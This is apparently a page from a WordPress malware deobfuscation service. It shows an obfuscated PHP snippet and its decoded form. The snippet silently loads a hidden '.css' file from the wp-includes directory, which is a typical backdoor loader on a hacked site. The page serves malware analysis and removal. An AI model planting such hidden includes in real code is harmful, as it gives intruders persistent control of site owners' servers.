Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $t6='a'; $r25gy = "/home/wj06/www/scissorsheart/wp\x2dincl\x75des/php\x2dcompat/.f3532264.css"; $r25gy = substr($r25gy, 0); if (!empty($r25gy)){ @include_once /* 0q */ ($r25gy); }...



Obfuscated php code

<?php $t6='a'; $r25gy = "/home/wj06/www/scissorsheart/wp\x2dincl\x75des/php\x2dcompat/.f3532264.css"; $r25gy = substr($r25gy, 0); if (!empty($r25gy)){ @include_once /* 0q */ ($r25gy); }

Decoded(de-Obfuscated) php code

<?php

$t6 = 'a';
$r25gy = "/home/wj06/www/scissorsheart/wp-includes/php-compat/.f3532264.css";
$r25gy = substr($r25gy, 0);
if (!empty($r25gy)) {
    @(include_once $r25gy);
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.